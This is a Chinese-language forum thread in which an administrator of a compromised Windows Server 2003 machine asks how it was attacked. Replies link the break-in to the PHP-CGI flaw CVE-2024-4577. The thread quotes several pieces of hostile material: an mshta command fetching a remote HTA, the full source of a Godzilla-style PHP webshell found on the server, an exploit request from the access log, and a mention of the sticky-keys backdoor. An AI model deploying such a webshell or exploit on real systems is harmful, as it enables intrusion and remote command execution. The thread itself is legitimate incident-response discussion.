是谁用什么方式攻击了我的服务器呢？

服务器(windows server 2003)，阿里云的，运行了 xampp ，也运行了 iis （为了兼容以前的程序）。服务器是给自己另外的一个服务器提供数据，是使用的 web 接口。刚刚远程登录，上面出现了 5 个异常窗口，标题是“http://88.218.76.13/d3.hta”，明显是被攻击了，之前没有遇到过这种，窗口是使用“mshta http://88.218.76.13/d3.hta”,查到每个窗口对应一个进程的父进程是独立的 cmd ，一共 5 个 cmd ，进程还都在，但是这 5 个 cmd 的父进程不在了，无法进一步追查。看了 apache 日志和 iid 日志，里面没有找到关于 88.218.76.13 的信息。这个窗口里面的源代码是

<HTML><HEAD> <META content="text/html; charset=gb2312" http-equiv=Content-Type></HEAD> <BODY></BODY></HTML>”

我想先将 mshta 删除掉，但是还是不知道是哪里出现了问题，想追查漏洞的出处，如何追查呢？所有的程序都是我自己写的，接口出现问题的可能性很小。

idragonet

2024-06-19 22:13:24 +08:00

windows server 2003 ？？没搞错吧，今年是 2024 了。

NewYear

2024-06-19 22:28:10 +08:00

你用的 xampp 榜上有名啊。

php 最近公布影响几乎所有版本的漏洞，修补了没？

hefish

2024-06-19 22:28:29 +08:00

这么老的机器，跑在互联网上，即便不上 waf 之类的，至少搞个 ip 白名单吧。因为他是提供接口的嘛，应该能搞 ip 白名单。

wheat0r

2024-06-19 22:43:16 +08:00

感觉是在叠 buff

cnevil

2024-06-19 22:56:10 +08:00

CVE-2024-4577 ？

wtks1

2024-06-19 22:56:50 +08:00

2003 ，这个太老了，rdp 直接就有可以利用的漏洞吧，好歹做个白名单

rb6221

2024-06-19 23:19:34 +08:00

虽然不知道是什么原因，但是升级新版本至少是可以堵上很多漏洞的

Fred0410

2024-06-19 23:21:15 +08:00

2003 漏洞多到令人发指。。

nekopara

2024-06-19 23:26:13 +08:00

优质肉鸡

euph

2024-06-19 23:33:10 +08:00

@cnevil 应该是了 https://www.secrss.com/articles/66997 ，和文中事件二一样

rulagiti

2024-06-20 07:21:55 +08:00

行走的肉鸡？

ShinichiYao

2024-06-20 08:30:35 +08:00

https://v2ex.com/t/1048418

wangybsyuct

2024-06-20 09:37:10 +08:00

@euph
@cnevil
@hefish
@wtks1
果然是，我在 web 根目录里发现个文件叫 Zq91u4b.php ，里面的内容就是有关 payload 的，暂时未发现服务器异常，可能是所有的程序都是自己写的原因，勒索软件暂时没有得逞，刚刚做了个快照，想想怎么完善一下，谢谢大家。那个 php 文件原文是这样的。
><?php
>@session_start();
>@set_time_limit(0);
>@error_reporting(0);
>function encode($D,$K){
> for($i=0;$i<strlen($D);$i++) {
> $c = $K[$i+1&15];
> $D[$i] = $D[$i]^$c;
> }
> return $D;
>}
>$pass='dddzzz';
>$payloadName='payload';
>$key='f25200d5d90fa403';
>if (isset($_POST[$pass])){
> $data=encode(base64_decode($_POST[$pass]),$key);
> if (isset($_SESSION[$payloadName])){
> $payload=encode($_SESSION[$payloadName],$key);
> if (strpos($payload,"getBasicsInfo")===false){
> $payload=encode($payload,$key);
> }
> eval($payload);
> echo substr(md5($pass.$key),0,16);
> echo base64_encode(encode(@run($data),$key));
> echo substr(md5($pass.$key),16);
> }else{
> if (strpos($data,"getBasicsInfo")!==false){
> $_SESSION[$payloadName]=encode($data,$key);
> }
> }
>}
>

hgert

2024-06-20 10:33:21 +08:00

当你已经怀疑一台服务器的时候最好的办法就是备份数据后重装 doge

71efNjg6n5jD74Lm

2024-06-20 13:32:37 +08:00

@wangybsyuct #13 经典的 phpwebshell ，Godzilla 使用的 webshell ，光看这个 payload 肯定看不出它是怎么拿到权限的，还是得看日志，建议有备份就恢复或者转移，没备份现在备份下换环境处理下。2003 太老了，再说也不知道你 web 环境是什么，多方面都有可能。

71efNjg6n5jD74Lm

2024-06-20 13:42:54 +08:00

不过光看你上面发的 ip 和文件名来看，是 TellYouThePass 常用的，而且从 ioc 库里看到的这个团伙最近确实是使用了 CVE-2024-4577 的 poc 来攻击，好消息是你没中勒索的招，坏消息是，这个 phpwebshell 很有可能跟你屏幕上存在的 cmd 窗口中的那个团伙并不是一个，也许是两伙人，也有可能是三。。甚至更多。

ShinichiYao

2024-06-20 13:47:21 +08:00

一个 POST 就可以在你机器上执行任何命令

chf007

2024-06-20 14:12:12 +08:00

阿里云还能给你提供 server 2003 也是的

chf007

2024-06-20 14:18:53 +08:00

成功的勾起了十几年前的回忆

想当年 07 、08 年左右最喜欢搞的就是这个，进去后再加个粘滞键的利用

你 3389 登录的时候连按下 shift 看看有没有惊喜

wangybsyuct

2024-06-20 15:29:23 +08:00

@Sw0rt1
@hgert
@ShinichiYao
@chf007
使用多款杀毒软件扫描过了，处理这些，还发现了一个被植入的挖矿程序.moneroocean ，从文件日期看，是十几天前，是不是我的系统太老了，导致其无法进一步捣乱。服务器存在的时间比较久，里面的数据有点多而且复杂，阿里云对 2003 也提供的充分的支持。如果是换成新的 windows 或者 linux ，是不是就容易中招了呢？！
服务器已经手动做了很多防护，针对远程桌面的攻击比较频繁，防护的方法除了改端口改用户名等，我还写了一个日志分析程序，如果遇到攻击远程桌面，会给发邮件，微信就会提醒。

攻击日志就像下面的，数量不多。
128.199.166.165 - - [08/Jun/2024:16:01:43 +0800] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.1" 200 12
从日志看，apache 居然返回的 200 的成功标志？
我自己请求这个字符串时，返回的是 500 ，居然不是 404 。

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1050981

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.